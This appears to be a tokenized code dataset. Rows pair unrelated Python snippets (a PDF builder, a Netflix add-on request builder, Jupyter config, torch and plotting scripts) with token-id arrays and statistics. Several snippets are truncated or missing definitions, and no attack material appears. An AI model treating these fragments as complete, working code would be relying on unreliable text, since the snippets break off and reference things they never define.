"""Remove the temp file"""
os.remove(self._meta_pre_path)
####################### PRIMARY INTERFACE BUILD #######################
def build(self):
"""Build the pdf"""
with tempfile.TemporaryDirectory('.aps-tmp') as tmp:
# Build issue
metas = get_issue_meta(self._meta_issue, str(tmp))
meta_cache = {m.article.name: m for m in metas}
# output cover pages
self.add_page_cover()
self.add_page_contents(meta_cache)
self.output(os.path.join(str(tmp), 'cover.pdf'))
# Get overall writer
writer = pypdf.PdfFileWriter()
# Write out fully assembled file
with open(self._meta_pre_path, 'wb') as out_fid:
# writer.write(fid)
# Establish cover pages
with open(os.path.join(str(tmp), 'cover.pdf'), 'rb') as fid:
cover_reader = pypdf.PdfFileReader(fid)
page = cover_reader.getNumPages()
writer.appendPagesFromReader(cover_reader, after_page_append=0)
writer.write(out_fid)
# Walk through individual article pdfs and add each to the overall PDF
parents = {1: None}
for level, item in self._meta_issue.contents(include_level=True):
if item.__class__.__name__ == 'Section':
parents[level + 1] = self._meta_bookmark(item.name, page, parent=parents.get(level, None))
else: # Article
meta = meta_cache[item.name]
with open(meta.file, 'rb') as fid:
reader = pypdf.PdfFileReader(fid)
writer.appendPagesFromReader(reader, after_page_append=page)
writer.write(out_fid)
self._meta_bookmark(meta.article.name, page, parent=parents[level])
page += meta.pages
# writer.write(out_fid)
self.add_bookmarks()
self.cleanup()
| [
37811,
20456,
20081,
198,
37811,
628,
198,
11748,
17268,
198,
11748,
277,
12315,
198,
11748,
28686,
198,
11748,
3108,
8019,
198,
11748,
9485,
20456,
17,
355,
279,
4464,
7568,
198,
11748,
20218,
7753,
198,
11748,
640,
198,
11748,
19720,
19... | 2.088186 | 3,606 |
# -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Optional
from synapse.api.constants import LimitBlockingTypes, UserTypes
from synapse.api.errors import Codes, ResourceLimitError
from synapse.config.server import is_threepid_reserved
from synapse.types import Requester
logger = logging.getLogger(__name__)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
15069,
12131,
383,
24936,
13,
2398,
5693,
327,
13,
40,
13,
34,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
... | 3.606299 | 254 |
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 Sebastian Golasch (plugin.video.netflix)
Copyright (C) 2018 Caphm (original implementation module)
MSL request building
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
from __future__ import absolute_import, division, unicode_literals
import json
import base64
import random
import subprocess
import time
from resources.lib.globals import g
import resources.lib.common as common
# check if we are on Android
try:
SDKVERSION = int(subprocess.check_output(
['/system/bin/getprop', 'ro.build.version.sdk']))
except (OSError, subprocess.CalledProcessError):
SDKVERSION = 0
if SDKVERSION >= 18:
from .android_crypto import AndroidMSLCrypto as MSLCrypto
else:
from .default_crypto import DefaultMSLCrypto as MSLCrypto
class MSLRequestBuilder(object):
"""Provides mechanisms to create MSL requests"""
@common.time_execution(immediate=True)
def msl_request(self, data, esn):
"""Create an encrypted MSL request"""
return (json.dumps(self._signed_header(esn)) +
json.dumps(self._encrypted_chunk(data, esn)))
@common.time_execution(immediate=True)
def handshake_request(self, esn):
"""Create a key handshake request"""
header = json.dumps({
'entityauthdata': {
'scheme': 'NONE',
'authdata': {'identity': esn}},
'headerdata':
base64.standard_b64encode(
self._headerdata(is_handshake=True).encode('utf-8')).decode('utf-8'),
'signature': ''
}, sort_keys=True)
payload = json.dumps(self._encrypted_chunk(envelope_payload=False))
return header + payload
@common.time_execution(immediate=True)
def _headerdata(self, esn=None, compression=None, is_handshake=False):
"""
Function that generates a MSL header dict
:return: The base64 encoded JSON String of the header
"""
self.current_message_id = self.rndm.randint(0, pow(2, 52))
header_data = {
'messageid': self.current_message_id,
'renewable': True,
'capabilities': {
'languages': [g.LOCAL_DB.get_value('locale_id')],
'compressionalgos': [compression] if compression else [] # GZIP, LZW, Empty
}
}
if is_handshake:
header_data['keyrequestdata'] = self.crypto.key_request_data()
else:
header_data['sender'] = esn
_add_auth_info(header_data, self.user_id_token)
return json.dumps(header_data)
@common.time_execution(immediate=True)
def decrypt_header_data(self, data, enveloped=True):
"""Decrypt a message header"""
header_data = json.loads(base64.standard_b64decode(data))
if enveloped:
init_vector = base64.standard_b64decode(header_data['iv'])
cipher_text = base64.standard_b64decode(header_data['ciphertext'])
return json.loads(self.crypto.decrypt(init_vector, cipher_text))
return header_data
def _add_auth_info(header_data, user_id_token):
"""User authentication identifies the application user associated with a message"""
if user_id_token and _is_useridtoken_valid(user_id_token):
# Authentication with user ID token containing the user identity
header_data['useridtoken'] = user_id_token
else:
# Authentication with the user credentials
credentials = common.get_credentials()
header_data['userauthdata'] = {
'scheme': 'EMAIL_PASSWORD',
'authdata': {
'email': credentials['email'],
'password': credentials['password']
}
}
def _is_useridtoken_valid(user_id_token):
"""Check if user id token is not expired"""
token_data = json.loads(base64.standard_b64decode(user_id_token['tokendata']))
return token_data['expiration'] > time.time()
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
220,
220,
220,
15069,
357,
34,
8,
2177,
26190,
402,
12456,
354,
357,
33803,
13,
15588,
13,
36977,
8,
198,
220,
220,
220,
15069,
357,
34,
8,
2864,
4476,
2... | 2.375811 | 1,695 |
# from https://github.com/jupyterhub/mybinder.org-deploy/blob/master/appendix/extra_notebook_config.py
import os
# if a user leaves a notebook with a running kernel,
# the effective idle timeout will typically be CULL_TIMEOUT + CULL_KERNEL_TIMEOUT
# as culling the kernel will register activity,
# resetting the no_activity timer for the server as a whole
if os.getenv('CULL_TIMEOUT'):
# shutdown the server after no activity
c.NotebookApp.shutdown_no_activity_timeout = int(os.getenv('CULL_TIMEOUT'))
if os.getenv('CULL_KERNEL_TIMEOUT'):
# shutdown kernels after no activity
c.MappingKernelManager.cull_idle_timeout = int(
os.getenv('CULL_KERNEL_TIMEOUT'))
if os.getenv('CULL_INTERVAL'):
# check for idle kernels this often
c.MappingKernelManager.cull_interval = int(os.getenv('CULL_INTERVAL'))
# a kernel with open connections but no activity still counts as idle
# this is what allows us to shutdown servers when people leave a notebook open and wander off
if os.getenv('CULL_CONNECTED') not in {'', '0'}:
c.MappingKernelManager.cull_connected = True
# Change default log format
c.Application.log_format = "%(color)s[%(levelname)s %(asctime)s.%(msecs).03d %(name)s %(module)s:%(lineno)d]%(end_color)s %(message)s"
if c.Application.log_level != 'DEBUG':
c.Application.log_level = 'WARN'
| [
2,
422,
3740,
1378,
12567,
13,
785,
14,
73,
929,
88,
353,
40140,
14,
1820,
65,
5540,
13,
2398,
12,
2934,
1420,
14,
2436,
672,
14,
9866,
14,
1324,
19573,
14,
26086,
62,
11295,
2070,
62,
11250,
13,
9078,
198,
11748,
28686,
198,
2,
... | 2.802521 | 476 |
# -*- coding: utf-8 -*-
""" 东方财富网:个股详情爬虫 """
import re
import scrapy
import json
import time
from crawl import db
from crawl import helper
from crawl.models.Stock import Stock
from crawl.models.StockDetail import StockDetail
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
220,
10310,
250,
43095,
164,
112,
95,
43380,
234,
163,
121,
239,
171,
120,
248,
10310,
103,
164,
224,
94,
46237,
99,
46349,
227,
163,
230,
105,
164,
247,
... | 2.414894 | 94 |
import torch
x = torch.randn(10, 5)
print(x)
labels = torch.LongTensor([1,2,3,3,0,0,0,0,0,0])
n_classes = x.shape[-1]
one_hot = torch.nn.functional.one_hot(labels, n_classes)
print(one_hot)
print(x * one_hot)
compare = (x * one_hot).sum(-1).unsqueeze(-1).repeat(1, n_classes)
print(compare)
compared_scores = x >= compare
print(compared_scores)
rr = 1 / compared_scores.float().sum(-1)
print(rr)
mrr = rr.mean()
print(mrr) | [
11748,
28034,
198,
198,
87,
796,
28034,
13,
25192,
77,
7,
940,
11,
642,
8,
198,
198,
4798,
7,
87,
8,
198,
198,
23912,
1424,
796,
28034,
13,
14617,
51,
22854,
26933,
16,
11,
17,
11,
18,
11,
18,
11,
15,
11,
15,
11,
15,
11,
15,... | 2.16 | 200 |
import sys
import h5py
import json
import numpy as np
import matplotlib.pyplot as plt
filename = sys.argv[1]
data = h5py.File(filename,'r')
attr = json.loads(data.attrs['jsonparam'])
#for k,v in attr['config'].items():
# print(k,v)
#print()
#
#for k,v in attr['param'].items():
# print(k,v)
#
#print()
#print()
#print()
cal_data = attr['cal_data']
arena_contour = np.array(cal_data['position']['contour'])
x_arena = arena_contour[:,0,0]
y_arena = arena_contour[:,0,1]
t_total = np.array(data['t_total'])
t_trial = np.array(data['t_trial'])
body_angle = np.array(data['body_angle'])
# Put angle in range (0,pi)
mask = body_angle < 0.0
body_angle[mask] = body_angle[mask] + np.pi
# Extract fly position
pos = np.array(data['position'])
x = pos[:,0]
y = pos[:,1]
plt.figure(1)
plt.plot(t_total, np.rad2deg(body_angle),'.-')
plt.xlabel('t (sec)')
plt.ylabel('angle (deg)')
plt.grid(True)
plt.figure(2)
plt.plot(x_arena, y_arena, 'r')
plt.plot(x,y)
plt.xlabel('x (pix)')
plt.ylabel('y (pix)')
plt.grid(True)
plt.axis('equal')
plt.show()
plt.show()
| [
11748,
25064,
198,
11748,
289,
20,
9078,
198,
11748,
33918,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
34345,
796,
25064,
13,
853,
85,
58,
16,
60,
198,
7890,
796,
289,
... | 2.167006 | 491 |
from typing import NoReturn
from .StoryManager import StoryManager
| [
6738,
19720,
1330,
1400,
13615,
198,
6738,
764,
11605,
13511,
1330,
8362,
13511,
628
] | 4.857143 | 14 |
import numpy as np
import pylab as pl
from peri.test import init
crbs = []
rads = np.arange(1, 10, 1./5)
rads = np.linspace(1, 10, 39)
rads = np.logspace(0, 1, 50)
s = init.create_single_particle_state(imsize=64, radius=1, sigma=0.05)
blocks = s.blocks_particle(0)
for rad in rads:
print "Radius", rad
s.update(blocks[-1], np.array([rad]))
crb = []
for block in blocks:
crb.append( s.fisher_information([block])[0,0] )
crbs.append(crb)
crbs = 1.0 / np.sqrt(np.array(crbs))
pl.figure()
pl.loglog(rads, crbs[:,0], 'o-', lw=1, label='pos-z')
pl.loglog(rads, crbs[:,1], 'o-', lw=1, label='pos-y')
pl.loglog(rads, crbs[:,2], 'o-', lw=1, label='pos-x')
pl.loglog(rads, crbs[:,3], 'o-', lw=1, label='rad')
pl.legend(loc='upper right')
pl.xlabel("Radius")
pl.ylabel("CRB")
pl.show()
| [
11748,
299,
32152,
355,
45941,
198,
11748,
279,
2645,
397,
355,
458,
198,
198,
6738,
583,
72,
13,
9288,
1330,
2315,
198,
198,
6098,
1443,
796,
17635,
198,
81,
5643,
796,
45941,
13,
283,
858,
7,
16,
11,
838,
11,
352,
19571,
20,
8,
... | 2.066327 | 392 |
#!/usr/bin/python
import simple_test
simple_test.test("test27", [])
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
11748,
2829,
62,
9288,
198,
198,
36439,
62,
9288,
13,
9288,
7203,
9288,
1983,
1600,
685,
12962,
198
] | 2.592593 | 27 |
import calendar
import json
import os.path
import warnings
from pathlib import Path
from collections import OrderedDict
in_json = Path('/media/data/GDL_all_images/data_file.json')
out_json = Path('/media/data/GDL_all_images/data_file_dates.json')
root_cutoff = Path('/media/data/')
img_root_dir = '/media/data/GDL_all_images/WV2'
generate_json(img_root_dir, out_json, root_cutoff, debug=False) | [
11748,
11845,
198,
11748,
33918,
198,
11748,
28686,
13,
6978,
198,
11748,
14601,
198,
198,
6738,
3108,
8019,
1330,
10644,
198,
6738,
17268,
1330,
14230,
1068,
35,
713,
198,
198,
259,
62,
17752,
796,
10644,
10786,
14,
11431,
14,
7890,
14... | 2.744828 | 145 |
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This manages Project Enums."""
from .base_enum import ExtendedIntEnum
class ProjectRoles(ExtendedIntEnum):
"""This enum provides the list of Project Roles."""
Developer = 1, 'Developer'
Manager = 2, 'Manager'
Cto = 3, 'Executive Sponsor'
class ProjectStatus(ExtendedIntEnum):
"""This enum provides the list of Project Status."""
Draft = 1, 'Draft'
Dev = 2, 'Development'
DevComplete = 3, 'Development Complete'
ComplianceChecks = 4, 'Compliance Checks'
ComplianceReview = 5, 'Compliance Review'
ComplianceChecksComplete = 6, 'Compliance Checks Complete'
AwaitingProdKeys = 7, 'Awaiting Prod Keys'
InProd = 8, 'In Prod'
| [
2,
15069,
10673,
13130,
22783,
286,
3517,
9309,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
... | 3.355263 | 380 |
######################################
# Django 模块
######################################
from django.db import models
from django.db.models import Q
######################################
# 系统模块
######################################
import datetime
######################################
# 自定义模块
######################################
from usr.models import UserProfile
######################################
# 平台表
######################################
######################################
# 平台用户表
######################################
| [
29113,
4242,
2235,
198,
2,
37770,
10545,
101,
94,
161,
251,
245,
198,
29113,
4242,
2235,
198,
6738,
42625,
14208,
13,
9945,
1330,
4981,
198,
6738,
42625,
14208,
13,
9945,
13,
27530,
1330,
1195,
198,
198,
29113,
4242,
2235,
198,
2,
133... | 4.036496 | 137 |
"""
RHESSI LightCurve Tests
"""
from __future__ import absolute_import
import pytest
import sunpy.lightcurve
from sunpy.time import TimeRange
from numpy import all
| [
198,
37811,
198,
48587,
7597,
40,
4401,
26628,
303,
30307,
198,
37811,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
198,
11748,
12972,
9288,
198,
11748,
4252,
9078,
13,
2971,
22019,
303,
198,
6738,
4252,
9078,
13,
2435,
133... | 3.34 | 50 |
from .graph import graph
from .graph2 import graph2
| [
6738,
764,
34960,
1330,
4823,
198,
6738,
764,
34960,
17,
1330,
4823,
17,
198
] | 3.714286 | 14 |
from flask import Flask
from flask import render_template,request,redirect,url_for,abort
from ..models import User,Citizen
from . import main
from .forms import SearchForm,AdminForm
from .. import db,photos
from flask_login import login_required,current_user
import markdown2
@main.route('/',methods = ['GET','POST'])
def index():
'''
View root page function that returns the index page and its data
'''
title = 'Home - Welcome to The citizens Website Online'
return render_template('index.html', title = title)
@main.route('/about',methods = ['GET','POST'])
def about():
'''
View root page function that returns the index page and its data
'''
title = 'About UIP'
return render_template('about.html', title = title)
@main.route('/search',methods= ['GET','POST'])
@login_required
| [
6738,
42903,
1330,
46947,
198,
6738,
42903,
1330,
8543,
62,
28243,
11,
25927,
11,
445,
1060,
11,
6371,
62,
1640,
11,
397,
419,
198,
6738,
11485,
27530,
1330,
11787,
11,
34,
36958,
198,
6738,
764,
1330,
1388,
198,
6738,
764,
23914,
133... | 3.185328 | 259 |
# Time: O(m * n)
# Space: O(m * n)
# Given a matrix consists of 0 and 1, find the distance of the nearest 0 for each cell.
# The distance between two adjacent cells is 1.
#
# Example 1:
#
# Input:
# 0 0 0
# 0 1 0
# 0 0 0
#
# Output:
# 0 0 0
# 0 1 0
# 0 0 0
#
# Example 2:
#
# Input:
# 0 0 0
# 0 1 0
# 1 1 1
#
# Output:
# 0 0 0
# 0 1 0
# 1 2 1
#
# Note:
# The number of elements of the given matrix will not exceed 10,000.
# There are at least one 0 in the given matrix.
# The cells are adjacent in only four directions: up, down, left and right.
| [
2,
3862,
25,
220,
440,
7,
76,
1635,
299,
8,
198,
2,
4687,
25,
440,
7,
76,
1635,
299,
8,
198,
198,
2,
11259,
257,
17593,
10874,
286,
657,
290,
352,
11,
1064,
262,
5253,
286,
262,
16936,
657,
329,
1123,
2685,
13,
198,
2,
383,
... | 2.619048 | 210 |
__all__ = ['rvm']
import numpy as np
#import pdb
#from pyandres import cholInvert
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Initialization
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Pre-process basis
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Compute the full statistics
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# One iteration
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Iterate until convergence
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# Post-process
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#***************
# Test
#***************
#import matplotlib.pyplot as pl
#N = 10
#M = 11
#XStenflo = np.asarray([-2.83000,-1.18000,0.870000,1.90000,3.96000,5.01000,6.25000,8.10000,9.98000,12.1200]).T
#Outputs = np.asarray([0.0211433,0.0167467,0.00938793,0.0183543,-0.00285475,-0.000381000,0.00374350,0.000126900,0.0121750,0.0268133]).T
## Define the basis functions. Gaussians of width 3.4 evaluated at the observed points
#basisWidth = 3.4
#C = XStenflo[:,np.newaxis]
#Basis = np.exp(-(XStenflo-C)**2 / basisWidth**2)
#Basis = np.hstack([Basis, np.ones((1,N)).T])
## Instantitate the RVM object and train it
#p = rvm(Basis, Outputs, noise=0.018)
#p.iterateUntilConvergence()
## Do some plots
#f = pl.figure(num=0)
#ax = f.add_subplot(1,1,1)
#ax.plot(XStenflo, Outputs, 'ro')
#ax.plot(XStenflo, np.dot(Basis, p.wInferred))
| [
834,
439,
834,
796,
37250,
81,
14761,
20520,
198,
11748,
299,
32152,
355,
45941,
198,
2,
11748,
279,
9945,
198,
2,
6738,
12972,
392,
411,
1330,
442,
349,
818,
1851,
198,
198,
2,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
36917,
... | 2.593985 | 665 |